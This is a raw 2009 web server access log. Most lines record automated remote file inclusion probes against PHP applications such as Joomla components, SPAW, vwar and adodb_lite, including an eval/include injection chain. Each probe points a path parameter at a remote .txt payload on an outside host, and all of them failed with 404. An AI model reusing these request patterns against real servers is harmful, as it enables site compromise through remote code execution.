72.52.230.168 - - [14/May/2009:21:58:26 -0500] "GET //admin/spaw/spaw_control.class.php?spaw_root=http://www.mastercraftplumbing.com/help/copyright.txt???? HTTP/1.1" 404 317 "-""Mozilla/5.0"
72.52.230.168 - - [14/May/2009:21:58:26 -0500] "GET /logs/access_log.1238716800//admin/spaw/spaw_control.class.php?spaw_root=http://www.mastercraftplumbing.com/help/copyright.txt???? HTTP/1.1" 404 344 "-""Mozilla/5.0"
72.52.230.168 - - [14/May/2009:21:58:26 -0500] "GET /logs//admin/spaw/spaw_control.class.php?spaw_root=http://www.mastercraftplumbing.com/help/copyright.txt???? HTTP/1.1" 404 322 "-""Mozilla/5.0"
217.18.76.16 - - [14/May/2009:21:58:29 -0500] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.mamet.wen.ru/MADONGCMD.txt?? HTTP/1.1" 404 339 "-""libwww-perl/5.805"
217.18.76.16 - - [14/May/2009:21:58:30 -0500] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.mamet.wen.ru/MADONGCMD.txt?? HTTP/1.1" 404 334 "-""libwww-perl/5.805"
72.52.230.168 - - [14/May/2009:21:58:48 -0500] "GET /logs/access_log.1235088000//admin/spaw/spaw_control.class.php?spaw_root=http://www.mastercraftplumbing.com/help/copyright.txt???? HTTP/1.1" 404 344 "-""Mozilla/5.0"
87.106.135.14 - - [14/May/2009:21:59:57 -0500] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.mamet.wen.ru/MADONGCMD.txt?? HTTP/1.1" 404 339 "-""libwww-perl/5.805"
87.106.135.14 - - [14/May/2009:21:59:57 -0500] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.mamet.wen.ru/MADONGCMD.txt?? HTTP/1.1" 404 334 "-""libwww-perl/5.805"
66.249.67.180 - - [14/May/2009:22:00:46 -0500] "GET /logs/access_log.1192752000 HTTP/1.1" 200 3031 "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
122.153.212.195 - - [14/May/2009:22:02:16 -0500] "GET //admin/spaw/spaw_control.class.php?spaw_root=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 317 "-""Mozilla/5.0"
122.153.212.195 - - [14/May/2009:22:02:16 -0500] "GET /logs/access_log.1238716800//admin/spaw/spaw_control.class.php?spaw_root=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 344 "-""Mozilla/5.0"
122.153.212.195 - - [14/May/2009:22:02:16 -0500] "GET /logs//admin/spaw/spaw_control.class.php?spaw_root=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 322 "-""Mozilla/5.0"
122.153.212.195 - - [14/May/2009:22:02:16 -0500] "GET /logs/access_log.1239321600//admin/spaw/spaw_control.class.php?spaw_root=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 344 "-""Mozilla/5.0"
122.153.212.195 - - [14/May/2009:22:02:51 -0500] "GET /logs/access_log.1239667200//admin/spaw/spaw_control.class.php?spaw_root=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 344 "-""Mozilla/5.0"
217.18.76.16 - - [14/May/2009:22:06:37 -0500] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.mamet.wen.ru/MADONGCMD.txt?? HTTP/1.1" 404 339 "-""libwww-perl/5.805"
217.18.76.16 - - [14/May/2009:22:06:37 -0500] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.mamet.wen.ru/MADONGCMD.txt?? HTTP/1.1" 404 334 "-""libwww-perl/5.805"
124.0.54.98 - - [14/May/2009:22:06:46 -0500] "GET /logs/access_log.1239148800///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://stonemac.com/bbs/g/id1.txt? HTTP/1.1" 404 362 "-""Mozilla/5.0"
124.0.54.98 - - [14/May/2009:22:06:46 -0500] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://stonemac.com/bbs/g/id1.txt? HTTP/1.1" 404 340 "-""Mozilla/5.0"
124.0.54.98 - - [14/May/2009:22:06:46 -0500] "GET ///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://stonemac.com/bbs/g/id1.txt? HTTP/1.1" 404 335 "-""Mozilla/5.0"
85.214.86.93 - - [14/May/2009:22:07:44 -0500] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 317 "-""Mozilla/5.0"
85.214.86.93 - - [14/May/2009:22:07:44 -0500] "GET //modules/vwar/admin/admin.php?vwar_root=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 312 "-""Mozilla/5.0"
85.214.86.93 - - [14/May/2009:22:07:44 -0500] "GET /logs/access_log.1235174400//modules/vwar/admin/admin.php?vwar_root=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 339 "-""Mozilla/5.0"
69.172.92.14 - - [14/May/2009:22:08:05 -0500] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.mamet.wen.ru/MADONGCMD.txt?? HTTP/1.1" 404 339 "-""libwww-perl/5.803"
69.172.92.14 - - [14/May/2009:22:08:05 -0500] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.mamet.wen.ru/MADONGCMD.txt?? HTTP/1.1" 404 334 "-""libwww-perl/5.803"
87.106.135.14 - - [14/May/2009:22:08:13 -0500] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.mamet.wen.ru/MADONGCMD.txt?? HTTP/1.1" 404 339 "-""libwww-perl/5.805"
87.106.135.14 - - [14/May/2009:22:08:13 -0500] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.mamet.wen.ru/MADONGCMD.txt?? HTTP/1.1" 404 334 "-""libwww-perl/5.805"
124.0.54.98 - - [14/May/2009:22:08:31 -0500] "GET /logs/access_log.1239062400///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://stonemac.com/bbs/g/id1.txt? HTTP/1.1" 404 362 "-""Mozilla/5.0"
117.110.58.66 - - [14/May/2009:22:09:04 -0500] "GET /logs/access_log.1236211200/index2.php?mosConfig_absolute_path=http://208.98.22.241/id.txt??? HTTP/1.1" 404 320 "-""libwww-perl/5.79"
117.110.58.66 - - [14/May/2009:22:09:04 -0500] "GET /index2.php?mosConfig_absolute_path=http://208.98.22.241/id.txt??? HTTP/1.1" 404 293 "-""libwww-perl/5.79"
117.110.58.66 - - [14/May/2009:22:09:04 -0500] "GET /logs/access_log.1235692800/index2.php?mosConfig_absolute_path=http://208.98.22.241/id.txt??? HTTP/1.1" 404 320 "-""libwww-perl/5.79"
117.110.58.66 - - [14/May/2009:22:09:04 -0500] "GET /logs/index2.php?mosConfig_absolute_path=http://208.98.22.241/id.txt??? HTTP/1.1" 404 298 "-""libwww-perl/5.79"
193.221.119.126 - - [14/May/2009:22:09:30 -0500] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://isportion.co.kr/kboard/lang/fatal1.txt???? HTTP/1.1" 404 306 "-""Mozilla/5.0"
193.221.119.126 - - [14/May/2009:22:09:30 -0500] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://isportion.co.kr/kboard/lang/fatal1.txt???? HTTP/1.1" 404 301 "-""Mozilla/5.0"
193.221.119.126 - - [14/May/2009:22:09:30 -0500] "GET /logs/access_log.1236729600//s_loadenv.inc.php?DOCUMENT_ROOT=http://isportion.co.kr/kboard/lang/fatal1.txt???? HTTP/1.1" 404 328 "-""Mozilla/5.0"
193.221.119.126 - - [14/May/2009:22:09:45 -0500] "GET /logs/access_log.1238803200//s_loadenv.inc.php?DOCUMENT_ROOT=http://isportion.co.kr/kboard/lang/fatal1.txt???? HTTP/1.1" 404 328 "-""Mozilla/5.0"
193.221.119.126 - - [14/May/2009:22:10:07 -0500] "GET /logs/access_log.1239667200//s_loadenv.inc.php?DOCUMENT_ROOT=http://isportion.co.kr/kboard/lang/fatal1.txt???? HTTP/1.1" 404 328 "-""Mozilla/5.0"
213.186.113.5 - - [14/May/2009:22:11:23 -0500] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://indoirc.go.ro/idscan.txt??? HTTP/1.1" 404 351 "-""libwww-perl/5.79"
213.186.113.5 - - [14/May/2009:22:11:23 -0500] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://indoirc.go.ro/idscan.txt??? HTTP/1.1" 404 346 "-""libwww-perl/5.79"
190.144.44.36 - - [14/May/2009:22:12:19 -0500] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.freewebtown.com/fatal2009/images/fx29id1.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
190.144.44.36 - - [14/May/2009:22:12:19 -0500] "GET //skin/zero_vote/ask_password.php?dir=http://www.freewebtown.com/fatal2009/images/fx29id1.txt?? HTTP/1.1" 404 315 "-""Mozilla/5.0"
190.144.44.36 - - [14/May/2009:22:12:19 -0500] "GET /logs/access_log.1231718400//skin/zero_vote/ask_password.php?dir=http://www.freewebtown.com/fatal2009/images/fx29id1.txt?? HTTP/1.1" 404 342 "-""Mozilla/5.0"
212.59.11.66 - - [14/May/2009:22:12:56 -0500] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 337 "-""Mozilla/5.0"
212.59.11.66 - - [14/May/2009:22:12:56 -0500] "GET /logs/access_log.1233014400//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 364 "-""Mozilla/5.0"
212.59.11.66 - - [14/May/2009:22:12:56 -0500] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 342 "-""Mozilla/5.0"
212.59.11.66 - - [14/May/2009:22:13:01 -0500] "GET /logs/access_log.1236643200//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 364 "-""Mozilla/5.0"
87.106.135.14 - - [14/May/2009:22:14:30 -0500] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.mamet.wen.ru/MADONGCMD.txt?? HTTP/1.1" 404 339 "-""libwww-perl/5.805"
87.106.135.14 - - [14/May/2009:22:14:31 -0500] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.mamet.wen.ru/MADONGCMD.txt?? HTTP/1.1" 404 334 "-""libwww-perl/5.805"
66.249.67.180 - - [14/May/2009:22:14:51 -0500] "GET /logs/access_log.1236038400 HTTP/1.1" 200 195224 "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.67.180 - - [14/May/2009:22:14:51 -0500] "GET /logs/access_log.1133049600 HTTP/1.1" 200 489 "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
217.18.76.16 - - [14/May/2009:22:17:05 -0500] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.mamet.wen.ru/MADONGCMD.txt?? HTTP/1.1" 404 339 "-""libwww-perl/5.805"
217.18.76.16 - - [14/May/2009:22:17:06 -0500] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.mamet.wen.ru/MADONGCMD.txt?? HTTP/1.1" 404 334 "-""libwww-perl/5.805"
62.128.135.52 - - [14/May/2009:22:17:25 -0500] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.gitchigaming.com/.inv?? HTTP/1.1" 404 318 "-""libwww-perl/5.805"
62.128.135.52 - - [14/May/2009:22:17:25 -0500] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.gitchigaming.com/.inv?? HTTP/1.1" 404 323 "-""libwww-perl/5.805"
221.157.225.65 - - [14/May/2009:22:18:27 -0500] "GET //setup.php?%20dir=http://laskar.mw.lt/id.txt?? HTTP/1.1" 404 293 "-""Mozilla/5.0"
221.157.225.65 - - [14/May/2009:22:18:27 -0500] "GET /logs/access_log.1231718400//setup.php?%20dir=http://laskar.mw.lt/id.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
221.157.225.65 - - [14/May/2009:22:18:27 -0500] "GET /logs//setup.php?%20dir=http://laskar.mw.lt/id.txt?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
221.157.225.65 - - [14/May/2009:22:19:27 -0500] "GET /logs/access_log.1233964800//setup.php?%20dir=http://laskar.mw.lt/id.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
66.249.67.180 - - [14/May/2009:22:19:32 -0500] "GET /logs/access_log.1207267200 HTTP/1.1" 200 3819 "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
216.120.237.150 - - [14/May/2009:22:19:42 -0500] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.gitchigaming.com/.inv?? HTTP/1.1" 404 318 "-""libwww-perl/5.811"
216.120.237.150 - - [14/May/2009:22:19:42 -0500] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.gitchigaming.com/.inv?? HTTP/1.1" 404 323 "-""libwww-perl/5.811"
77.221.130.11 - - [14/May/2009:22:20:13 -0500] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.gitchigaming.com/.inv?? HTTP/1.1" 404 318 "-""libwww-perl/5.805"
77.221.130.11 - - [14/May/2009:22:20:13 -0500] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.gitchigaming.com/.inv?? HTTP/1.1" 404 323 "-""libwww-perl/5.805"
122.153.212.195 - - [14/May/2009:22:20:56 -0500] "GET //modules/vwar/admin/admin.php?vwar_root=http://stonemac.com/bbs/g/id1.txt? HTTP/1.1" 404 312 "-""Mozilla/5.0"
122.153.212.195 - - [14/May/2009:22:20:59 -0500] "GET /logs/access_log.1235174400//modules/vwar/admin/admin.php?vwar_root=http://stonemac.com/bbs/g/id1.txt? HTTP/1.1" 404 339 "-""Mozilla/5.0"
122.153.212.195 - - [14/May/2009:22:21:01 -0500] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://stonemac.com/bbs/g/id1.txt? HTTP/1.1" 404 317 "-""Mozilla/5.0"
213.186.113.5 - - [14/May/2009:22:21:40 -0500] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://indoirc.go.ro/idscan.txt??? HTTP/1.1" 404 332 "-""libwww-perl/5.79"
213.186.113.5 - - [14/May/2009:22:21:40 -0500] "GET //components/com_simpleboard/image_upload.php?sbp=http://indoirc.go.ro/idscan.txt??? HTTP/1.1" 404 327 "-""libwww-perl/5.79"
66.249.67.180 - - [14/May/2009:22:24:14 -0500] "GET /logs/access_log.1164326400 HTTP/1.1" 200 1056 "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.67.180 - - [14/May/2009:22:24:15 -0500] "GET /logs/access_log.1235779200 HTTP/1.1" 200 253940 "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
61.160.201.12 - - [14/May/2009:22:24:47 -0500] "GET /logs/joomla/index.php?option=com_restaurante&task=http://212.227.74.68/catalog/fx29id.txt? HTTP/1.1" 404 304 "-""Mozilla/5.0"
61.160.201.12 - - [14/May/2009:22:24:47 -0500] "GET /logs/access_log.1239667200/joomla/index.php?option=com_restaurante&task=http://212.227.74.68/catalog/fx29id.txt? HTTP/1.1" 404 326 "-""Mozilla/5.0"
61.160.201.12 - - [14/May/2009:22:24:47 -0500] "GET /logs/access_log.1239235200/joomla/index.php?option=com_restaurante&task=http://212.227.74.68/catalog/fx29id.txt? HTTP/1.1" 404 326 "-""Mozilla/5.0"
61.160.201.12 - - [14/May/2009:22:24:49 -0500] "GET /joomla/index.php?option=com_restaurante&task=http://212.227.74.68/catalog/fx29id.txt? HTTP/1.1" 404 299 "-""Mozilla/5.0"
81.175.71.121 - - [14/May/2009:22:27:59 -0500] "GET /lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.ladyboss.com.ua/fx29id2.txt??? HTTP/1.1" 404 323 "-""Mozilla/5.0"
81.175.71.121 - - [14/May/2009:22:27:59 -0500] "GET /logs/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.ladyboss.com.ua/fx29id2.txt??? HTTP/1.1" 404 328 "-""Mozilla/5.0"
81.175.71.121 - - [14/May/2009:22:27:59 -0500] "GET /lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.ladyboss.com.ua/admin/fx29id2.txt??? HTTP/1.1" 404 323 "-""Mozilla/5.0"
81.175.71.121 - - [14/May/2009:22:27:59 -0500] "GET /logs/access_log.1239062400/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.ladyboss.com.ua/fx29id2.txt??? HTTP/1.1" 404 350 "-""Mozilla/5.0"
81.175.71.121 - - [14/May/2009:22:27:59 -0500] "GET /logs/access_log.1239062400/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.ladyboss.com.ua/admin/fx29id2.txt??? HTTP/1.1" 404 350 "-""Mozilla/5.0"
81.175.71.121 - - [14/May/2009:22:27:59 -0500] "GET /logs/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.ladyboss.com.ua/admin/fx29id2.txt??? HTTP/1.1" 404 328 "-""Mozilla/5.0"
87.106.135.14 - - [14/May/2009:22:28:09 -0500] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.mamet.wen.ru/MADONGCMD.txt?? HTTP/1.1" 404 339 "-""libwww-perl/5.805"
87.106.135.14 - - [14/May/2009:22:28:10 -0500] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.mamet.wen.ru/MADONGCMD.txt?? HTTP/1.1" 404 334 "-""libwww-perl/5.805"
81.175.71.121 - - [14/May/2009:22:28:33 -0500] "GET /logs/access_log.1237852800/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.ladyboss.com.ua/admin/fx29id2.txt??? HTTP/1.1" 404 350 "-""Mozilla/5.0"
81.175.71.121 - - [14/May/2009:22:28:47 -0500] "GET /logs/access_log.1237852800/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.ladyboss.com.ua/fx29id2.txt??? HTTP/1.1" 404 350 "-""Mozilla/5.0"
69.90.72.88 - - [14/May/2009:22:30:41 -0500] "GET /logs/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://indoirc.go.ro/idscan.txt??? HTTP/1.1" 404 348 "-""libwww-perl/5.805"
69.90.72.88 - - [14/May/2009:22:30:41 -0500] "GET /administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://indoirc.go.ro/idscan.txt??? HTTP/1.1" 404 343 "-""libwww-perl/5.805"
66.249.67.180 - - [14/May/2009:22:33:10 -0500] "GET /logs/access_log.1235952000 HTTP/1.1" 200 193437 "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
69.90.72.88 - - [14/May/2009:22:33:22 -0500] "GET /logs//components/com_cpg/cpg.php?mosConfig_absolute_path=http://indoirc.go.ro/idscan.txt??? HTTP/1.1" 404 315 "-""libwww-perl/5.805"
69.90.72.88 - - [14/May/2009:22:33:22 -0500] "GET //components/com_cpg/cpg.php?mosConfig_absolute_path=http://indoirc.go.ro/idscan.txt??? HTTP/1.1" 404 310 "-""libwww-perl/5.805"
65.55.106.164 - - [14/May/2009:22:35:54 -0500] "GET /robots.txt HTTP/1.1" 404 293 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
69.248.128.84 - - [14/May/2009:22:36:03 -0500] "GET /logs//login.php?dir=http://indoirc.go.ro/idscan.txt??? HTTP/1.1" 404 298 "-""libwww-perl/5.79"
69.248.128.84 - - [14/May/2009:22:36:05 -0500] "GET //login.php?dir=http://indoirc.go.ro/idscan.txt??? HTTP/1.1" 404 293 "-""libwww-perl/5.79"
65.55.106.164 - - [14/May/2009:22:37:00 -0500] "GET /logs/access_log.1192838400 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
213.186.113.5 - - [14/May/2009:22:37:06 -0500] "GET /logs//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://indoirc.go.ro/idscan.txt??? HTTP/1.1" 404 327 "-""libwww-perl/5.79"
213.186.113.5 - - [14/May/2009:22:37:07 -0500] "GET //modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://indoirc.go.ro/idscan.txt??? HTTP/1.1" 404 322 "-""libwww-perl/5.79"
116.50.163.164 - - [14/May/2009:22:38:08 -0500] "GET /index2.php?mosConfig_absolute_path=http://208.98.22.241/id.txt??? HTTP/1.1" 404 293 "-""libwww-perl/5.805"
116.50.163.164 - - [14/May/2009:22:38:08 -0500] "GET /logs/access_log.1236211200/index2.php?mosConfig_absolute_path=http://208.98.22.241/id.txt??? HTTP/1.1" 404 320 "-""libwww-perl/5.805"
116.50.163.164 - - [14/May/2009:22:38:09 -0500] "GET /logs/index2.php?mosConfig_absolute_path=http://208.98.22.241/id.txt??? HTTP/1.1" 404 298 "-""libwww-perl/5.805"
116.50.163.164 - - [14/May/2009:22:38:09 -0500] "GET /logs/access_log.1235692800/index2.php?mosConfig_absolute_path=http://208.98.22.241/id.txt??? HTTP/1.1" 404 320 "-""libwww-perl/5.805"
66.249.67.180 - - [14/May/2009:22:38:18 -0500] "GET /logs/access_log.1150156800 HTTP/1.1" 200 1032 "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
200.58.119.65 - - [14/May/2009:22:39:14 -0500] "GET //index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://www.eforel.com/ecommerce/images/simplelists/id1.txt? HTTP/1.1" 404 293 "-""Mozilla/5.0"
200.58.119.65 - - [14/May/2009:22:39:15 -0500] "GET /logs//index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://www.eforel.com/ecommerce/images/simplelists/id1.txt? HTTP/1.1" 404 298 "-""Mozilla/5.0"
200.58.119.65 - - [14/May/2009:22:39:15 -0500] "GET /logs/access_log.1234569600//index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://www.eforel.com/ecommerce/images/simplelists/id1.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
171.64.75.45 - - [14/May/2009:22:39:23 -0500] "GET /logs//main.php?pagina=http://www.arylia.com/banners/93/yes.txt??? HTTP/1.1" 404 297 "-""libwww-perl/5.805"
171.64.75.45 - - [14/May/2009:22:39:23 -0500] "GET //main.php?pagina=http://www.arylia.com/banners/93/yes.txt??? HTTP/1.1" 404 292 "-""libwww-perl/5.805"
117.110.58.66 - - [14/May/2009:22:39:31 -0500] "GET /logs/access_log.1236297600/index2.php?mosConfig_absolute_path=http://208.98.22.241/id.txt??? HTTP/1.1" 404 320 "-""libwww-perl/5.79"
221.157.225.65 - - [14/May/2009:22:40:27 -0500] "GET /logs//error.php?%20dir=http://laskar.mw.lt/id.txt?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
221.157.225.65 - - [14/May/2009:22:40:27 -0500] "GET //error.php?%20dir=http://laskar.mw.lt/id.txt?? HTTP/1.1" 404 293 "-""Mozilla/5.0"
221.157.225.65 - - [14/May/2009:22:40:27 -0500] "GET /logs/access_log.1231718400//error.php?%20dir=http://laskar.mw.lt/id.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
69.248.128.84 - - [14/May/2009:22:40:59 -0500] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://indoirc.go.ro/idscan.txt??? HTTP/1.1" 404 317 "-""libwww-perl/5.79"
69.248.128.84 - - [14/May/2009:22:41:01 -0500] "GET //modules/vwar/admin/admin.php?vwar_root=http://indoirc.go.ro/idscan.txt??? HTTP/1.1" 404 312 "-""libwww-perl/5.79"
221.157.225.65 - - [14/May/2009:22:41:17 -0500] "GET /logs/access_log.1233964800//error.php?%20dir=http://laskar.mw.lt/id.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
217.18.76.16 - - [14/May/2009:22:42:17 -0500] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.mamet.wen.ru/MADONGCMD.txt?? HTTP/1.1" 404 339 "-""libwww-perl/5.805"
217.18.76.16 - - [14/May/2009:22:42:17 -0500] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.mamet.wen.ru/MADONGCMD.txt?? HTTP/1.1" 404 334 "-""libwww-perl/5.805"
217.18.76.16 - - [14/May/2009:22:42:48 -0500] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.mamet.wen.ru/MADONGCMD.txt?? HTTP/1.1" 404 339 "-""libwww-perl/5.805"
217.18.76.16 - - [14/May/2009:22:42:48 -0500] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.mamet.wen.ru/MADONGCMD.txt?? HTTP/1.1" 404 334 "-""libwww-perl/5.805"
66.249.67.180 - - [14/May/2009:22:43:00 -0500] "GET /logs/access_log.1178409600 HTTP/1.1" 200 1907 "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
211.110.19.24 - - [14/May/2009:22:43:55 -0500] "GET /logs/access_log.1239062400/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 350 "-""Mozilla/5.0"
211.110.19.24 - - [14/May/2009:22:43:55 -0500] "GET /lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 323 "-""Mozilla/5.0"
211.110.19.24 - - [14/May/2009:22:43:55 -0500] "GET /logs/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 328 "-""Mozilla/5.0"
211.110.19.24 - - [14/May/2009:22:44:19 -0500] "GET /logs/access_log.1237852800/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 350 "-""Mozilla/5.0"
